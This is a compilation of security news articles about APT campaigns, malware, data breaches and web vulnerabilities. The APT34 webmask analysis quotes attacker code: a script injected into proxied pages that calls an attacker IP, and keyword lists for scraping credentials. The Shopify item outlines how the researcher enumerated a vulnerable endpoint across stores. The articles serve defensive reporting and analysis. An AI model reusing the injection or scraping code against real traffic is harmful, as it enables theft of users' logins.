Iran-linked OilRig cyberespionage group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.Iran-linked OilRig cyberespione group is using the reconnaissance malware Karkoff along with DNSpionage in recent campaigns.

The OilRig APT group, the threat actor behind the DNSpionage malware campaign, is carrying out a new sophisticated and targeted operation that infects victims with a new variant of the dreaded malware.

DNSpionage is a custom RAT that uses HTTP and DNS communication to connect with the C&C server.

Threat actors distributed the malware through compromised websites and weaponized documents.

“In February, we discovered some changes to the actors’ tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware.” reads the analysis published by Talos. “In April 2019, we also discovered the actors using a new malware, which we are calling “Karkoff.” reads the analysis published by Talos.

DNSpionage decoy doc

According to Cisco Talos threat research team, the attackers are leveraging on new tactics, techniques, and procedures to improve the efficacy of their operations.

Unlike previous attacks, the group is now using a new malware, tracked as Karkoff, for reconnaissance purposes. Karkoff is used by hackers to surgically select a target and remain under the radar, it allows to gather system information related to the workstation environment, operating system, domain, and list of running processes on the victims’ machine.

Karkoff is developed in .NET, it also allows attackers to remotely execute arbitrary code on compromised hosts.

The experts link the DNSpionage and Karkoff malware after observing overlaps between their C2 infrastructure.

Experts noticed that the malware searches for two specific anti-virus solutions, Avira and Avast. If one of them is installed on the target system, a specific flag will be set, and some options from the configuration file will be ignored.

Researchers at Talos noticed that the Karkoff malware generates a log file on the compromised machine which tracks all commands it has executed and related timeline.

“From an incident response point of view, it’s interesting to note that the malware generates a log file: C:\\Windows\\Temp\\MSEx_log.txt. The executed commands are stored in this file (xored with ‘M’) with a timestamp.” continues the experts. “This log file can be easily used to create a timeline of the command execution which can be extremely useful when responding to this type of threat. With this in mind, an organisation compromised with this malware would have the opportunity to review the log file and identify the commands carried out against them.” “

Attackers behind the DNSpionage campaigns continue to be focused on entities in the Middle Eastern region, including Lebanon and the United Arab Emirates (UAE).

“The threat actor’s ongoing development of DNSpionage malware shows that the attacker continues to find new ways to avoid detection.” “DNS tunneling is a popular method of exfiltration for some actors and recent examples of DNSpionage show that we must ensure DNS is monitored as closely as an organization’s normal proxy or weblogs.” concludes Talos. “The discovery of Karkoff also shows the actor is pivoting and is increasingly attempting to avoid detection while remaining very focused on the Middle Eastern region.”

Pierluigi Paganini

(SecurityAffairs – hacking, DNSpionage)

The post OilRig APT uses Karkoff malware along with DNSpionage in recent attacks appeared first on Security Affairs.

Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer

Experts at Kaspersky Lab linked the recent supply-chain attack targeted ASUS users to the “ShadowPad” threat actor and the CCleaner incident.

Security researchers at Kaspersky Lab linked the recent supply-chain attack that hit ASUS users (tracked as Operation ShadowHammer) to the “ShadowPad” threat actor. Experts also linked the incident to the supply chain attack that targeted CCleaner in September 2018. The Operation ShadowHammer was dcampaign was uncovered by experts from Kaspersky Lab and took place between June and November 2018, but experts discovered it in January 2019. iscovered in January 2019, attackers used a Trojanized version of the ASUS Live Update utility to install a backdoor on specific devices, selected based on their MAC addresses. ASUS has since released software updates to address the issue. 

According to Kaspersky, threat actors tampered with a legitimate binary that was initially compiled in 2015 and that was digitally signed to avoid detection.

The malicious code injected in the binaries allows to fetch and install a backdoor used in the attack to control the compromised systems.

“It is important to note that any, even tiny, tampering with executables in such a case normally breaks the digital signature. However, in this case, the digital signature was intact: valid and verifiable. We quickly realized that we were dealing with a case of a compromised digital signature.” reads the analysis published by Kaspersky.

“We believe this to be the result of a sophisticated supply chain attack, which matches or even surpasses the ShadowPad and the CCleaner incidents in complexity and techniques. The reason that it stayed undetected for so long is partly the fact that the trojanized software was signed with legitimate certificates (e.g. “ASUSTeK Computer Inc.”).”

The supply chain attack was very sophisticated and very targeted, the backdoor was designed to be installed on only 600 select devices, identified through their MAC address.

Some of the MAC addresses targeted by the hackers were rather popular, such as i.e. 00-50-56-C0-00-08 that belongs to the VMWare virtual adapter VMNet8 and is shared by all users of a certain version of the VMware software for Windows.

Another MAC address used in the attack was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter designed by Huawei for the USB 3G modem, model E3372h.

During their investigation, experts found other digitally signed binaries from three other vendors in Asia. The binaries are signed with different certificates and a unique chain of trust, but experts pointed out that the way the binaries were trojanized was the same in the three cases.

“The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code.” continues the analysis. “Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation.”

ASUS ShadowPad

Experts found many similarities between non-ASUS-related cases and the ASUS supply chain attack, such as the algorithm used to calculate API function hashes, and the use of IPHLPAPI.dll from within a shellcode embedded into a PE file.

The investigators also found a connection between the ASUS attack to the ShadowPad backdoor that was first detected in 2017 and that was attributed to the Axiom group (also known as APT17 or DeputyDog).

The most popular campaign attributed to the APT17 group is the attack on the Google’s infrastructure, also known as Operation Aurora. For almost a decade the APT17 targeted government organizations in several Southeast Asian countries and the US, NGOs, defense contractors, law firms, IT firms, and mining companies.

According to malware experts at Intezer the code used in the CCleaner attack has many similarities with the code used by the Axiom group.

Experts at Kaspersky noticed that the malicious code used in the Operation ShadowHammer have reused algorithms from multiple malware samples, including many of PlugX RAT, a backdoor used by many Chinese-speaking hacker groups.

“ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker.” Kaspersky concludes. 

“How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism,”

Pierluigi Paganini

(SecurityAffairs – Asus Supply Chain attack, ShadowPad )

The post Kaspersky speculates the involvement of ShadowPad attackers in Operation ShadowHammer appeared first on Security Affairs.

Bodybuilding.com forces password reset after a security breach

Bad news for fitness and bodybuilding passionates, the popular online retailer Bodybuilding.com announced that hackers have broken into its systems.

The popular online retailer website Bodybuilding.com announced last week that hackers have broken into its systems. The website offers any kind of fitness articles, exercises, workouts, and supplements.

The company confirmed it has no evidence that personal customer information was accessed or misused, as a precautionary measure the company is notifying all current and former users and customers.

“Bodybuilding.com recently became aware of a data security incident that may have affected certain customer information in our possession. We have no evidence that personal information was accessed or misused, but we are directly notifying all current and former users and customers out of an abundance of caution.” reads the announcement published on the website.

“We became aware of a data security incident involving unauthorized access to our systems in February 2019. We engaged one of the leading data security firms to conduct a thorough investigation, which traced the unauthorized activity to a phishing email received in July 2018. On April 12, 2019, we concluded our investigation and could not rule out that personal information may have been accessed.”

The company hired a security firm to investigate the incident, it discovered that the attack begun with a phishing email received in July 2018.

The company reported the incident to law enforcement and with the help of the security firm is addressing the flaws exploited by the attackers and remediate the incident. The IT staff behind Bodybuilding.com also introduced additional security measures and forced a password reset for its customers.

Data potentially exposed in the incident includes name, Bodybuilding.com usernames and passwords. email address, billing/shipping addresses, phone number, order history, any communications with Bodybuilding.com, birthdate, and any information included in the BodySpace profile.

According to the firm, potentially accessed data don’t include full payment card numbers because the firm does not store them.

“The information potentially accessed in this incident does NOT include full credit or debit card numbers, as we do not store those numbers when customers make purchases in our store.” continues the data breach notification note. “If you’ve opted to store your card in your account, we store only the last four digits of your payment card number for reference and use by you for subsequent purchases, but never the entire card number.”

Bodybuilding.com Discloses Data Breach

As usual. Bodybuilding.com users have to change their password for any other account on which they might have used the same credentials as for the Bodybuilding.com account.

Below recommendations provided by the company:

  • Change your password for any other account on which you used the same or similar information used for your Bodybuilding.com account.
  • Review your accounts for suspicious activity.
  • Be cautious of any unsolicited communications that ask for your personal data or refer you to a web page asking for personal data.
  • Avoid clicking on links or downloading attachments from suspicious emails.

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Bodybuilding.com forces password reset after a security breach appeared first on Security Affairs.

G7 Comes Out in Favor of Encryption Backdoors

From a G7 meeting of interior ministers in Paris this month, an "outcome document":

Encourage Internet companies to establish lawful access solutions for their products and services, including data that is encrypted, for law enforcement and competent authorities to access digital evidence, when it is removed or hosted on IT servers located abroad or encrypted, without imposing any particular technology and while ensuring that assistance requested from internet companies is underpinned by the rule law and due process protection. Some G7 countries highlight the importance of not prohibiting, limiting, or weakening encryption;

There is a weird belief amongst policy makers that hacking an encryption system's key management system is fundamentally different than hacking the system's encryption algorithm. The difference is only technical; the effect is the same. Both are ways of weakening encryption.

FireEye experts found source code for CARBANAK malware on VirusTotal

Cybersecurity researchers from FireEye revealed that the Carbanak source code has been available on VirusTotal for two years, and none noticed it before.

Researchers at FireEye discovered that the Carbanak source code has been available on VirusTotal for two years, but it was not noticed before.

The Carbanak gang (aka FIN7, Anunak or Cobalt) stole over a billion euros from banks across the world, the name “Carbanak” comes with the name of the malware they used to compromise computers at banks, other financial institutions, restaurants, and other industries.

CARBANAK cybercrime gang was first uncovered in 2014 by Kaspersky Lab that dated its activity back to 2013 when the group leveraged the Anunak malware in targeted attacks on financial institutions and ATM networks. Between 2014 and 2016 the group used a new custom malware dubbed Carbanak that is considered a newer version of Anunak.

Starting from 2016 the group developed a new custom malware using Cobalt Strike, a legitimate penetration testing framework.

CARBANAK

The experts discovered the source code, builders, and some previously unknown plugins in two different RAR archives.

The two archives were both uploaded two years ago from the same Russian IP address.

“On the heels of that publication, our colleague Nick Carr uncovered a pair of RAR archives containing CARBANAK source code, builders, and other tools (both available in VirusTotal: kb3r1p and apwmie).” reads a blog post published by FireEye.

“CARBANAK source code was 20MB comprising 755 files, with 39 binaries and 100,000 lines of code. Our goal was to find threat intelligence we missed in our previous analyses.”

Last year, law enforcement arrested between January and June three Ukrainian suspects, Dmytro Fedorov, Fedir Hladyr, and Andrii Kopakov.

Fedorov, is a skilled hacker and, who is suspected to be a manager of the group, was arrested at the request of U.S. officials in Bielsko-Biala, Poland, in January and is currently waiting for his extradition to the United States.

In January 2018 foreign authorities also arrested Fedir Hladyr in Dresden, Germany, he is currently detained in Seattle pending trial.  Hladyr is suspected to be a system administrator for the group.

In late June 2018, foreign authorities arrested Andrii Kolpakov in Lepe, Spain.  The man is suspected to be a supervisor of the group. He is currently detained in Spain pending the United States’ request for extradition.

Pierluigi Paganini

(SecurityAffairs – Carbanak, Russia)

The post FireEye experts found source code for CARBANAK malware on VirusTotal appeared first on Security Affairs.

Targeted Attacks hit multiple embassies with Trojanized TeamViewer

CheckPoint firm uncovered a cyber espionage campaign leveraging a weaponized version of TeamViewer to target officials in several embassies in Europe.

Security experts at CheckPoint uncovered a cyber espionage campaign leveraging a weaponized version of TeamViewer and malware disguised as a top-secret US government document to target officials in several embassies in Europe.

The targeted attacks aimed at Embassy officials from at least seven countries (Italy, Kenya, Bermuda, Nepal, Guyana, Lebanon, and Liberia), individuals hit by the hackers were tied to government revenue related roles and the financial sector. This aspect suggests a possible financial motivation for the campaign.

The nature of the targets and the multiple-stage nature of the attacks suggest the involvement of a nation state attacker.

According to the experts, the malicious code and the decoy documents were developed by an individual that goes online with the handle EvaPiks.
EvaPiks was also the moniker of a user of an illegal Russian-carding forum for some time.

“Although in such campaigns it is usually unclear who is behind the attack, in this case we were able to locate a user who appears to be behind the aforementioned activity active in several online forums, or is at least the creator of the tools used in the attack.” reads the analysis published by CheckPoint.

“By following the trail from the previous campaigns we were able to find a `CyberForum[.]ru` user that goes by the name “EvaPiks”In multiple instances, the user would suggest, or be advised by other users to use, some of the techniques we witnessed throughout the campaigns.”

EvaPiks is suspected to be the developer of the entire infection chain.

The attack chain starts with spear-phishing messages using an XLSM document with malicious macros and having as a subject “Military Financing Program.”

The decoy document is well-crafted, it shows a logo of the US Department of State on it and marked as top secret.

“Although the attackers have worked hard to make the document appear convincing, they seem to have overlooked some Cyrillic artifacts (such as the Workbook name) that were left in the document, and could potentially reveal more information about the source of this attack.” continues the analysis.

The macros extract the following files from encoded cells within the XLSM document:

  • a legitimate AutoHotkey (AHK) program;
  • a malicious version of AHK that connects to a C2 server to fetch and execute a Trojanized version of TeamViewer that establish a backdoor in the infected system.
trojanized teamviewer

The malicious TeamViewer can also include other features such as hiding the interface of TeamViewer, saving the current TeamViewer session credentials to a text file, allowing the transfer and execution of additional EXE or DLL files.

Experts pointed out that EvaPiks has been involved in previous campaigns where attackers used other weaponized versions of TeamViewer.

One of the variants analyzed by Check Point implemented had the ability to send some basic system information back to the attacker and to delete itself from the infected system. A second variant observed in 2018 used a new command system and targeted a long list of banks, cryptocurrency exchange, and e-commerce sites.

The third and current variant implements a DLL execution feature and uses external AutoHotKey scripts to gather information and session credentials.

“On the one hand, from the findings we have described, this appears to be a well thought-out attack that carefully selects a handful of victims and uses tailored decoy content to match the interests of its target audience.

On the other hand, some aspects of this attack were carried out with less caution, and have exposed details that are usually well disguised in similar campaigns, such as the personal information and online history of the perpetrator, as well as the outreach of their malicious activity.” concludes CheckPoint.

“However, the activity history of the developer behind the attack in underground carding forums and the victim’s characteristics may imply that the attacker is financially motivated.”

Further technical details, including IoCs are reported in the analysis published by the experts.

Pierluigi Paganini

(SecurityAffairs – TeamViewer, hacking)

The post Targeted Attacks hit multiple embassies with Trojanized TeamViewer appeared first on Security Affairs.

Iran-linked APT34: Analyzing the webmask project

Security expert Marco Ramilli published the findings of a quick analysis of the webmask project standing behind the DNS attacks implemented by APT34 (aka OilRig and HelixKitten).

Thanks to the leaked source code it is now possible to check APT34 implementations and techniques.

Contest:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code sees three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrogseems to be single projects, the folder Webshells_and_Panel looks like wrapping more projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmaskk project, in my personal opinion, is an APT34 distinction since implementing their DNS attack core. APT34 is well-known to widely use DNS Hijacking in order to redirect victims to attackers websites. So let’s see what they’ve implemented so far on this direction.

The webmask project comes with both: a guide (guide.txt) and an installation script (install.sh). From the latter we might appreciate the NodeJS installed version which happens to be 6.X. This version was released on 2016-04-26 for the first time. Nowadays is still on development track as the name of “Boron”. According to the NodeJS historic versioning that project could not be dated before April 2016 since Nodejs_6.x was not existing before that date. The guide.txt file suggests two solutions (this is the used term) both of them base their ‘core engine’ on a developed DNS server, used as authoritative name servers to respond crafted ‘A’ records to specific requests. The attackers suggest to use solution2 (they write “use this” directly on configuration file), the one who implements DNS server in NodeJS language. On the other side the Solution1 uses python as DNS server. The following image shows the suggested Solution.

APT34: WebMask Project Suggested Solution

Some domain names and some IPs are used as configuration example. Personally I always find interesting to see the attacker suggested examples, since they lets a marked flavour of her. That time the attacker used some target artefacts (IP and DNS) belonging to ‘Arab Emirates’ net space while she used as a responsive artefact (the one used to attack) an IP address belonging to a NovinVPS service.

The guide follows on describing the setup of ICAP proxy server, used to proxy the victims to the real destination but trapping the entire connections. The attacker suggests Squid3 and guides the operator to install and to configure it. She uses as ICAP handler a simple python script placed into icap/icap.pyfolder. This script has been developed in order to log and to modify the ICAP/connection flow coming from squid3 proxy. Then a well-known Haproxy is used as High Availability service for assuring connections and finally certbot (Let’s Encrypt) is used to give valid certificate to squid3 (but it’s not a mandatory neither a suggested step).

DNS Server scripts

In the folder dns-redir 3 files are placed. A configuration file called config.json is used by dnsd.py. The python script implements a class named MyUDPHandler which is given to the native SocketServer.UDPServer and used as UDP handler. The script overrides only DNS A records if included into the overrides object (variable at the beginning of source code). In other words if the DNS request is an A record and if the requested name belongs to specific domain name, the script responds with the attacker IP address. The following image shows the main 3 steps of the override chain.


DNSD.py: Three steps DNS overriding chain

According to the guide.txt the suggested solution won’t be the dnsd.py, but the attacker would prefer the dnsd.js script. This script appears not externally configurable (it does not import config.json) so if you want to configure it you need to manually edit the script source code. The source is written in an classic style ECMAScript without any fancy or new operators/features introduced in ECMAScript6 and ECMAScript7. The dnsd.js performs the same tasks performed by dnsd.py without any specific change.

ICAP script

In the icap folder a python script called icap.py is placed. This script handles ICAP flows coming from squid3, extracts desired informations and injects tracking pixels. The python script implements a ThreadingSimpleServer as an implementation of SocketServer.ThreadingMixInwhich is a native framework for multi-threading Network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class by referring to the general ICAPHandler. Aims of the script is to log into separated files the following information: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following javascript to HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is a HTTP POST the ICAPHandler tries to extract credentials through special function called: extract_login_password. The following image shows the process flow of the credential extraction.

ICAP.py: Credential Extraction Process

It would be interesting, at least in my point of view, to check the used patterns as login detection. For example the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name','alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

Interesting to see specific string patterns such as (but not limited to): form_pw, ahd_password, upassword, senha, contrasena, which are quite indicative to victim scenarios. For example strings such as: senha, contrasena,usuario, and so on seems to be related to”Spanish” / “Portuguese” words. So if it’s true (and google translate agrees with me) it looks like APT34 are proxying some connections that might have those username and password fields, which might refer to “Spanish”/”Portuguese” targets. But this is only a Hypothesis.

The icap.py is able to intercept basic authentication headers, cookies and general headers as well, implementing similar functions able to extract interesting information and eventually to modify them if needed. I wont describe every single functions but one of the most interesting function that is worth of being showed is the inject_RESPMOD which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the Injection_RESPMOD function.

ICAP.py: script injection function

The injected script is added to the HTML body and eventually is GZipped and shipped back. In such a way the attacker tracks who is landing to the target domain.

Interesting points

  • WebMask is >= April 2016 (From Installed Dependencies)
  • APT34 might target ‘Arab Emirate’ (From examples into config files)
  • APT34 might target Spanish/Portuguese (From code into the extract_login_password function )
  • APT34 might use NovinVPS (From examples into config files)
  • APT34 needs credentials for change Authoritative DNS (From guide.txt)

The original post is available at the following URL:

About the Author: Marco Ramilli founder of Yoroi

I am a computer security scientist with an intensive hacking background. I do have a MD in computer engineering and a PhD on computer security from University of Bologna. During my PhD program I worked for US Government (@ National Institute of Standards and Technology, Security Division) where I did intensive researches in Malware evasion techniques and penetration testing of electronic voting systems.

I do have experience on security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been encharged of testing uVote voting system from the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial aglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence center I’ve ever experienced! Now I technically lead Yoroi defending our customers strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – APT34, DNS attacks)



The post Iran-linked APT34: Analyzing the webmask project appeared first on Security Affairs.

EmCare reveals patient and employee data were hacked

EmCare disclosed that a number of employees’ email accounts had been hacked, potentially exposing personal information of patients and employees.EmCare disclosed that a number of employees’ email accounts had been hacked, potentially exposing personal information of patients and employees.

US healthcare firm EmCare Inc disclosed that a number of employees’ email accounts had been accessed, potentially exposing personal information of almost 60,000 people, including 31,000 patients.

EmCare is owned by Envision Healthcare, it is a leading provider of physician jobs for emergency medicine, inpatient physician services, radiology management programs and other healthcare services.

emcare

It has more than 700 practices at locations ranging from major hospitals and health systems to rural hospitals and ambulatory care centers.

EmCare, Inc. and its affiliates (EmCare) recently became aware that an unauthorized third party obtained access to a number of EmCare employees’ email accounts. EmCare provides physician services.” reads the incident notice published by the company.

“Patients impacted by this incident may have received medical care from a clinician employed by or engaged with an affiliate of EmCare. These services may have been provided in an Emergency Department or as inpatient services in a hospital.”

The company discovered the intrusion on February 19, hackers compromised some employees’ email accounts and gained access to some patients’, employees’ and contractors’ personal information.

“On Feb. 19, 2019, EmCare determined that the impacted email accounts contained some patients’, employees’ and contractors’ personal information, including name, date of birth or age, and for some patients, clinical information. In addition, in some instances, Social Security and driver’s license numbers were impacted.” continues the notice.

At the time of publishing, the company pointed out that there is no evidence to suggest that the information has been misused.

The extent of the security incident is still unclear, we have no information about the number of accounts that were accessed by the intruders. The company did not provide technical details about the hack.

In my humble opinion, the fact that employees were keeping patients’ data unprotected into their email accounts is very disturbing.

EmCare will offer identity protection and credit monitoring services for patients and employees whose Social Security or driver’s license numbers were exposed in the incident.

“As a general precautionary measure, individuals should remain vigilant about protecting themselves against potential fraud or identity theft by, among other things, reviewing their account statements and monitoring credit reports closely.” concludes the notice.

“If individuals detect any suspicious activity on an account, they should promptly notify the financial institution or company with which the account is maintained. They should also promptly report any fraudulent activity or any suspected incidents of identity theft to the proper law enforcement authorities, including the police and their state’s attorney general.”

Pierluigi Paganini

(SecurityAffairs – EmCare, data breach)

The post EmCare reveals patient and employee data were hacked appeared first on Security Affairs.

jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites

The popular jQuery JavaScript library is affected by a rare prototype pollution vulnerability that could allow attackers to modify a JavaScript object’s prototype.

The impact of the issue could be severe considering that the jQuery JavaScript library is currently used on 74 percent of websites online, most sites still use the 1.x and 2.x versions of the library that are affected by the ‘Prototype Pollution’ vulnerability.

This week the library has received a security patch to address the issue, this week, three years after the last major security flaw discovered in its code.

JavaScript objects are like variables that can be used to store multiple values based on a predefined structure. Prototypes are used to define a JavaScript object’s default structure and default values, they are essential to specify an expected structure when no values are set.

An attacker that is able to modify a JavaScript object prototype can make an application crash and change behavior if it doesn’t receive the expected values.

jQuery JavaScript library

Due to the diffusion of JavaScript, the exploitation of prototype pollution flaws could have serious consequences on web applications.

The vulnerability in the jQuery library (CVE-2019-11358) was discovered by researchers at Snyk that also published a proof of concept code for a prototype pollution attack.

“This security vulnerability referred to and manifests as prototype pollution, enables attackers to overwrite a JavaScript application object prototype.” reads the analysis published by Snyk. “When that happens, properties that are controlled by the attacker can be injected into objects and then either lead to denial of service by triggering JavaScript exceptions, or tamper with the application source code to force the code path that the attacker injects. “

The experts demonstrated that exploiting the flaw attackers can assign themselves admin rights on a web app that uses the jQuery library code.

Fortunately, according to the experts, this prototype pollution issue is not exploitable for mass-attacks because the exploit code must be crafted for each specific target.

Web developers using jQuery JavaScript library for their applications are advised to update their projects to the latest jQuery version, v3.4.0.

“jQuery 3.4.0 includes a fix for some unintended behavior when using jQuery.extend(true, {}, …). If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. This fix is included in jQuery 3.4.0, but patch diffs exist to patch previous jQuery versions,” reads the blog post published by the jQuery team.

Pierluigi Paganini

(SecurityAffairs – hacking, jQuery JavaScript library )


The post jQuery JavaScript library flaw opens the doors for attacks on hundreds of millions of websites appeared first on Security Affairs.

Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT

Palo Alto Networks Unit 42 researchers uncovered a malicious campaign targeting entities in North America, Europe, Asia, and the Middle East with RevengeRAT.

The campaign was carried out during March, threat actors tracked as
Aggah” used pages hosted on Bit.ly, BlogSpot, and Pastebin as a command-and-control (C2) infrastructure to distribute the RevengeRAT.

Attackers hit organizations in several industries including Technology, Retail, Manufacturing, State/Local Government, Hospitality, Medical, and other Professional business.

“In March 2019, Unit 42 began looking into an attack campaign that appeared to be primarily focused on organizations within a Middle Eastern country.” reads the analysis published by Palo Alto Networks.

“Further analysis revealed that this activity is likely part of a much larger campaign impacting not only that region but also the United States, and throughout Europe and Asia.”

The usage of legitimate services to deliver the malware aims at avoiding detection.

RevengeRAT variants were used by different APT groups, such as The Gorgon Group, that hit entities in the UK, Spain, Russia and in the US. The source code of the RAT has been publicly leaked a few years ago and could be actually part of multiple campaigns conducted by several threat actors. 

RevengeRAT allows to open remote shells on the infected system, manage system files, processes, and services, log keystrokes, edit the Windows Registry, edit the hosts file, dump users passwords, and access the webcam, and many more actions.

Researcher an analyzed a bait document built to load a malicious macro-enabled document from a remote server via Template Injection.

“These macros use BlogSpot posts to obtain a script that uses multiple Pastebin pastes to download additional scripts, which ultimately result in the final payload being RevengeRAT configured with a duckdns[.]org domain for C2.” continues the analysis.

“During our research, we found several related delivery documents that followed the same process to ultimately install RevengeRAT hosted on Pastebin, which suggests the actors used these TTPs throughout their attack campaign.”

Once the victims opened the decoy document, it will display a lure image designed to trick them into turning on Microsoft Office macros to “Enable Editing.” If the victim enables the macros, a remote OLE document containing the malicious macro would be loaded using template injection.

The OLE file loaded an embedded Excel document which would download a malicious script from a shortened URL using the Bit.ly service. In a similar way, the malicious code was also downloaded in other attacks from a Blogspot domain hosting a malicious JavaScript.

“The malicious script carries out several activities on the compromised system. First, it attempts to hamper Microsoft Defender by removing its signature set. The script also kills the Defender process along with the processes for several Office applications.” reads the analysis.

Experts pointed out that the technique of enabling macros and disabling ProtectedView in Office and the tactic of killing processes for Windows Defender and Microsoft Office applications were employed by Gorgon group in past campaigns. 

Once downloaded on a victim’s machine, the script will perform the following main actions:

Downloading a payload from a Pastebin URL
• Creating a scheduled task to periodically obtain and run a script from a Pastebin URL
• Creating an autorun registry key to obtain and run a script from a Pastebin URL

The last stage malware is downloaded from Pastebin, it is a RevengeRAT variant dubbed “Nuclear Explosion” that uses the lulla.duckdns[.]org domain as C2.

RevengeRAT

The analysis of a single bit.ly shortened URL revealed it was clicked over 1,900 times by targets from roughly 20 countries, this data could give us an idea of the extent of the campaign.

The analysis of decoy document’s properties allowed the experts to discover a number of other RevengeRAT samples used in this campaign.

Despite this, the Palo Alto Networks researchers conclude that there is no “concrete evidence that this attack campaign is associated with Gorgon.”

Pierluigi Paganini

(SecurityAffairs – hacking, RevengeRAT)


The post Campaign leverages Bit.ly, BlogSpot, and Pastebin to distribute RevengeRAT appeared first on Security Affairs.

A flaw in Shopify API flaw exposed revenue and traffic data of thousands of stores

Researcher discovered a high-severity flaw in Shopify e-commerce platform that could have been abused to expose the traffic and revenue data for the stores.

Bug bounty hunter Ayoub Fathi. discovered a vulnerability in a Shopify API endpoint that could be exploited to leak the revenue and traffic data of thousands of stores.

The Shopify platform is currently used by 800,000 different online merchants in more than 175 countries.

shopify

The white hat hacker analyzed the APIs published over the past year by Shopify that allow users to fetch sales data for graph presentations. He noticed that the system was leaking the revenue data of two unnamed Shopify stores, one of which had been removed from the platform.

The researcher carried out a mass check on all the existing stores to determine if the platform was affected by a Direct Object Reference (IDOR) issue iterating over $storeName.

Fathi then decided to perform a mass check on all existing stores instead to see if any customer information would leak through the API.

“The first idea that came to mind is to perform a mass check on eventually all existing stores, and see if we would get any customer data out of any.” reads a post published by the researcher.

“The attack process will be as follows:

  • Building a wordlist of store names (from storeName.myshopify.com);
  • Iterate the wordlist against the almost vulnerable endpoint:
/shops/$storeName/revenue_data.json
  • Filtering out the vulnerable domains;
  • Analyzing affected stores to figure out the root cause of the observed behaviour or eventual vulnerability.”

Fathi found that 4 out of 1000 stores (one of which was closed) were vulnerable. The researcher decided to make further test using a larger dataset, containing 813,684 records, using Forward DNS.

“Using this approach, we don’t need to generate store names from a given domain list. Instead, we will be using the FDNS to obtain reverse CNAME records of shops.myshopify.com (which all the stores point to) ” continues the expert. “Now, we will be looking for CNAME records that match shops.myshopify.com where Shopify merchants are hosting their stores.”

The hacker created and exploit.py script to use the new word list composed of 813K store names

Using this approach the expert retrieved a list of vulnerable stores and queried them to get monthly revenue data in USD of the current store during its lifetime.

“This was tested on 800K merchant stores, +12,100 of them were exposed, +8700 were vulnerable stores that we were able to obtain their sales and traffic data and they should not be public, and 3400 are expected to have their sales data public” wrote Fathi “to summarize:

  • This was tested on +800K stores
  • +12,100 were exposed
  • +8700 stores were vulnerable and their data is set to private.
  • Only +3400 stores data was expected to be public.”

The researcher discovered that the leak was caused by the Shopify Exchange App.

“Based on above data and a few more days of research, I came to the conclusion that this was caused by Shopify Exchange App (Actively used by merchants now) which was introduced only a few months before this vulnerability. Any merchant who has Exchange App installed would be vulnerable.” states Fathi.

